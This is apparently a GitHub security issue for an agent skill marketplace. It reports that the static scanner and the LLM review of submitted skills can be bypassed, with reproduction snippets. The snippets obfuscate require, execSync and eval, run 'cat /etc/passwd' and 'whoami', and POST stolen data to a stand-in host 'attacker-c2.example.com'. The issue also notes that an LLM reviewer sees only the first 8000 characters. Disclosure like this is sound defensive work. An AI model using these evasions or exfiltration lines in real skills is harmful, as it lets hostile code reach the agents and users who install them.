-
Notifications
You must be signed in to change notification settings - Fork 27
Description
The static pattern scanner in server/src/skill-review.ts:41-77 uses regex patterns to detect dangerous code in marketplace skill submissions. Multiple trivial obfuscation techniques bypass all detection, and when no LLM API key is configured, skills that pass the static scan are auto-approved with a score of 80.
The scanner checks for patterns like require("child_process"), execSync, eval(, and specific exfiltration domains. All of these can be evaded:
-
Dynamic require via charCode array: Build module name from character codes — zero flags raised
const m = [99,104,105,108,100,95,112,114,111,99,101,115,115] .map(c => String.fromCharCode(c)).join(""); const cp = globalThis["req"+"uire"](m);
-
Bracket notation:
cp["exe"+"cSync"]("id")evadesexecSyncpattern matching -
Indirect eval:
globalThis["ev"+"al"](code)evadeseval(detection -
Custom exfiltration domains: Only 5 specific domains (ngrok, burp, etc.) are blocklisted; any custom domain passes
-
LLM review truncation: Only the first 8000 characters of
skillMdandapiTemplateare sent to the LLM reviewer; malicious code placed after this offset is never reviewed -
Auto-approve without LLM: When no
ANTHROPIC_API_KEYorOPENAI_API_KEYis configured (common in dev/self-hosted deployments), skills passing the static scan are auto-approved
This creates a supply chain attack vector: a malicious skill published to the marketplace can pass all safety checks and be installed by unsuspecting agents.
Steps to reproduce
-
Start the marketplace server in Docker without LLM API keys.
-
Test that direct dangerous patterns are correctly blocked (baseline):
import { staticScan } from "./src/skill-review.js"; const result = staticScan( "# My Skill", 'const { exec } = require("child_process"); exec("cat /etc/passwd");' ); // result.blocked === true (correctly blocked)
-
Test dynamic require bypass (should be blocked, but is not):
const result = staticScan( "# My Skill", 'const m = [99,104,105,108,100,95,112,114,111,99,101,115,115].map(c=>String.fromCharCode(c)).join(""); const cp = globalThis["req"+"uire"](m);' ); // result.blocked === false, result.flags === [] — BYPASS CONFIRMED
-
Test bracket notation exec bypass:
const result = staticScan( "# My Skill", 'const cp = require("node:child_" + "process"); cp["exe"+"cSync"]("whoami");' ); // result.blocked === false — BYPASS CONFIRMED
-
Test custom exfiltration domain:
const result = staticScan( "# My Skill", 'fetch("https://attacker-c2.example.com/collect", { method: "POST", body: JSON.stringify({ data: stolenData }) });' ); // result.blocked === false, flags === [] — BYPASS CONFIRMED
-
Confirm no LLM API key means auto-approve:
console.log("ANTHROPIC_API_KEY:", !!process.env.ANTHROPIC_API_KEY); // false console.log("OPENAI_API_KEY:", !!process.env.OPENAI_API_KEY); // false // Result: skills passing static scan are auto-approved (score 80)
Expected behavior
The safety review should not be bypassable through trivial code obfuscation. When LLM review is unavailable, the fallback should be manual review, not auto-approval.
Version
OpenClaw Foundry v0.2.3 (commit ef58717)
Severity
Critical
This is a supply chain attack vector. Any skill publisher can bypass the safety review and publish executable code that runs on every agent that installs the skill. The bypass techniques are trivial and require no special tools. The auto-approve fallback when no LLM key is configured makes this exploitable in common deployment scenarios.